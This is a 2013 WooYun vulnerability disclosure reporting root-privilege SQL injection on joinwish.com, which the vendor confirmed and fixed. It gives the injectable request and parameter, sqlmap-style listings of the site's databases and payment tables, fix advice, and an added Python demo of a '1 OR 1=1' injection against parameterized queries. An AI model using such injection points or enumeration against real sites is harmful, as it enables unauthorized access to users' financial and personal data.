
Vulnerability summary

Defect ID: wooyun-2013-034484

Title: Multiple root-privilege SQL injections on Joinwish, data readable in seconds

Affected vendor: joinwish.com

Author: 小胖子

Submitted: 2013-08-16 10:56

Fix deadline: 2013-09-30 10:57

Public disclosure: 2013-09-30 10:57

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-08-16: Details sent to the vendor, awaiting vendor response
2013-08-19: Vendor confirmed; details visible to the vendor only
2013-08-29: Details disclosed to core white hats and domain experts
2013-09-08: Details disclosed to regular white hats
2013-09-18: Details disclosed to intern white hats
2013-09-30: Details disclosed to the public

Brief description:

I heard that Joinwish loves giving away gifts, so here I am.

Detailed description:

Almost the whole site uses pseudo-static URLs, but with some careful digging you can still find places that take dynamic parameters.
Injection point:

GET /wishservice/sponsors?uid=1&wid=10067221&sval=id HTTP/1.1
Referer: http://www.joinwish.com/wish/show/id/10067221
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.joinwish.com
Cookie: PHPSESSID=1km4sivvelstuqmolpqjspjq62
Accept-Encoding: gzip, deflate


Injectable parameter: uid. DBA privileges, time-based, and the data reads out in seconds.

[screenshot]


Many other places are injectable as well, with different parameters; please audit and fix all of them together.

[screenshot: WID.png]


Injectable locations and their parameters.

[screenshot]


There are quite a few databases.

[screenshot]


Over.

Proof of vulnerability:

Databases:

available databases [9]:
[*] huluwu
[*] huluwu_dev
[*] information_schema
[*] joinwish_product
[*] joinwish_verify
[*] logs
[*] mysql
[*] performance_schema
[*] test


Tables in the current database, joinwish_product:

Database: joinwish_product
[132 tables]
+------------------------------+
| account_freeze_tx |
| account_topups |
| account_transfers |
| account_tx |
| account_withdraws |
| accounts |
| alipay_transfer |
| alipay_transfer_batch |
| areas |
| auth_group |
| auth_group_permissions |
| auth_permission |
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| backend_tx |
| backends |
| bank_cities |
| bank_provinces |
| barcode_types |
| biz_card_bindings |
| brands |
| c2c_topup_requests |
| card_items |
| cities |
| cs_logs |
| cs_roles |
| cs_user_functions |
| cs_user_role_functions |
| cs_user_roles |
| cs_users |
| django_admin_log |
| django_content_type |
| django_session |
| django_site |
| errors |
| exchanges_users |
| favorite_wishes |
| gateway_audit |
| gateway_audit_result |
| gateway_order |
| give_user_brand |
| hulu_card_no_libs |
| invitees |
| merchants |
| mptopup_orders |
| offline_transfers |
| p2p_catalogs |
| p2p_comment |
| p2p_commodities |
| p2p_exchange_0 |
| p2p_exchange_1 |
| p2p_merchant |
| p2p_order |
| p2p_send_transaction |
| p2p_send_withdraw |
| p2p_settlement_payment_batch |
| p2p_ticket |
| p2p_ticket_batch |
| payment_card_logs |
| payment_channels |
| payment_orders |
| properties |
| provinces |
| public_utility_orders |
| refunded_transactions |
| settlement |
| settlement_detail |
| shopping_items |
| shopping_orders |
| terminal_requests |
| transaction_details |
| transactions |
| tx_types |
| user_addresses |
| user_backends |
| user_friends |
| user_mp_verify_codes |
| user_reg_requests |
| user_saved_cards |
| user_sessions |
| user_uploaded_pic_catalogs |
| user_uploaded_pics |
| user_wish_statistics |
| users |
| weibo_template |
| wish_albums |
| wish_amount_increase_logs |
| wish_award_logs |
| wish_base |
| wish_cash_coupons |
| wish_comments |
| wish_commodities |
| wish_cs_roles |
| wish_cs_user_functions |
| wish_cs_user_role_functions |
| wish_cs_user_roles |
| wish_cs_users |
| wish_details |
| wish_exchange_items |
| wish_exchange_tocheck_users |
| wish_exchange_view |
| wish_exchanges |
| wish_fans |
| wish_gifts |
| wish_give_logs |
| wish_give_tx |
| wish_guest_infos |
| wish_hp_use_logs |
| wish_join_requests |
| wish_members |
| wish_mer_exchange |
| wish_merchants |
| wish_msgs |
| wish_pdts |
| wish_praise_statistical |
| wish_prop_logs |
| wish_pub_logs |
| wish_solutions |
| wish_themes |
| wish_transfers |
| wish_user_banding |
| wish_user_guides |
| wish_user_notification |
| wish_user_verification |
| wish_users |
| wish_visit_logs |
| wishes |
| withdraw_fee_rate |
| ym_sms |
| ym_sms_mo |
| ym_sms_mt |
+------------------------------+


Fix recommendations:

0x1: Prepared statements, input filtering, and similar measures.
0x2: The database account's privileges are far too high.
0x3: I have the nerve to ask for a gift.
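The two technical points above, string-built SQL versus a bound parameter and an over-privileged database account, can be shown side by side. The following is an added illustration written for this page, not code from Joinwish or from the report: it assumes a constructed in-memory SQLite table called `sponsors` standing in for whatever backs `/wishservice/sponsors`, and the function names are hypothetical. The vulnerable lookup splices `uid` into the query text; the hardened one binds it as a value, and an edge check rejects anything that is not an integer id before it reaches the database at all.

```python
import sqlite3


def make_db():
    # Constructed sample data; not the real joinwish_product schema.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sponsors (id INTEGER PRIMARY KEY, uid INTEGER, wid INTEGER, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO sponsors (uid, wid, name) VALUES (?, ?, ?)",
        [(1, 10067221, "alice"), (2, 10067221, "bob"), (3, 555, "carol")],
    )
    return conn


def sponsors_vulnerable(conn, uid, wid):
    # The pattern behind the report: request input becomes part of the SQL text,
    # so the database cannot tell the value from the query around it.
    sql = f"SELECT name FROM sponsors WHERE uid = {uid} AND wid = {wid}"
    return [row[0] for row in conn.execute(sql)]


def sponsors_parameterized(conn, uid, wid):
    # Hardened form (the report's "prepared statements" point): the SQL text is
    # fixed and the driver binds uid/wid separately, so input is only ever a value.
    sql = "SELECT name FROM sponsors WHERE uid = ? AND wid = ?"
    return [row[0] for row in conn.execute(sql, (uid, wid))]


def parse_uid(raw):
    # Input validation at the edge: uid is a numeric id, so reject everything else
    # before it is ever used in a query.
    if not raw.isdigit():
        raise ValueError("uid must be a non-negative integer")
    return int(raw)


if __name__ == "__main__":
    db = make_db()
    # A tautology in uid widens the WHERE clause of the vulnerable query and
    # leaks a second user's row; the same string bound as a parameter matches nothing.
    print(sponsors_vulnerable(db, "1 OR 1=1", 10067221))      # ['alice', 'bob']
    print(sponsors_parameterized(db, "1 OR 1=1", 10067221))   # []
    print(sponsors_parameterized(db, parse_uid("1"), 10067221))  # ['alice']
```

The other half of the fix is outside the application code: the web tier should connect with a dedicated account limited to the `joinwish_product` database and the DML it actually needs, never as root, so that even a successful injection cannot enumerate `mysql` or the other databases listed above.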

Copyright notice: please credit the source when reposting: 小胖子@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-08-19 14:44

Vendor reply:

Fixed; the release goes out today.

Latest status:

None yet